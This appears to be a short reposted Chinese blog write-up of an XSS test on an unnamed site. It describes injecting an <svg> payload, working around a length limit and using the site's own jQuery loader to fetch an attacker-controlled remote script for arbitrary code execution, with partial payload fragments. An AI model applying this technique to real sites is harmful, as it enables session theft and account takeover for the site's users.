第二次XSS测试
来源:互联网 发布:小米6相机在那清除数据 编辑:程序博客网 时间:2024/06/03 09:24
这次 ,主要是别人给讲会的 ,自己也听明白了,记录下 操作过程 ....
首先,寻找有显示的注入点,找到一处 ,直接上手测试弹窗
输入完成发现并没有理想的直接弹窗 ,当点击删除,突然弹窗
这里是运用ajax ,单独局部加载的 ,也就是除非刷新这一块东西,否则代码不会更新,这样的js 代码岂不是很无用?!
谁闲得没事 ,点你个人兴趣啊 ,正统的应该是 ,你打开个人页面 直接弹窗,这是理想的
然后换标签注入 这里使用<svg> 然后是调用js 代码执行远程js 调用
只能这样
b='script' 长度11
a.createElement(b) 长度19 a=document.createElement('script');
a.src=xxx 你的远程js地址
document.head.append(child)
精简?
a=document; 长度12
但是,看看长度不可行!!!
没办法了 ,只能看看他们有没有jquery 可以使用了
看到这个 ,有重新燃起来插它的欲火 哈哈
我们这样用, 首先将地址 用变量b 保存起来
然后调用 $loadJs(b) 执行 js代码 ,让他们自己的东西 插自己
最后 调用js 文件 (文件里边只有一个alert(/xss/)),然后弹窗 ,这次弹窗和之前的弹窗就不一样了 ,这个文件是自己可以控制的 ,
可以执行任意代码~
1 0
- 第二次XSS测试
- 第二次测试
- 测试xss
- xss 测试
- XSS测试
- xss 测试
- 测试XSS
- XSS测试
- acm第二次测试
- 传智播客第二次测试总结
- 第二次测试总结
- 测试基础第二次总结
- 第二次打字测试
- XSS测试语句大全
- 回复XSS测试
- 如何测试XSS漏洞
- XSS测试语句大全
- xss简单渗透测试
- Hbase--1 简介
- 谁将成为中国版底特律?
- javax.jms.JMSException: Failed to build body from content. Serializable class not available to broke
- SVM-支持向量机算法概述
- 代理模式(Proxy)
- 第二次XSS测试
- [kuangbin带我飞]数位DP F(x)
- 利用jclasslib修改java编译后的.class文件
- iOS蓝牙开发(一)蓝牙相关基础知识
- chapter 1:计算机系统漫游
- 28附加题 八皇后问题
- [Database] 数据库索引-聚合索引与非聚合索引
- POJ 1789
- 1.【排序】Merge Sorted Array--Accepted Java code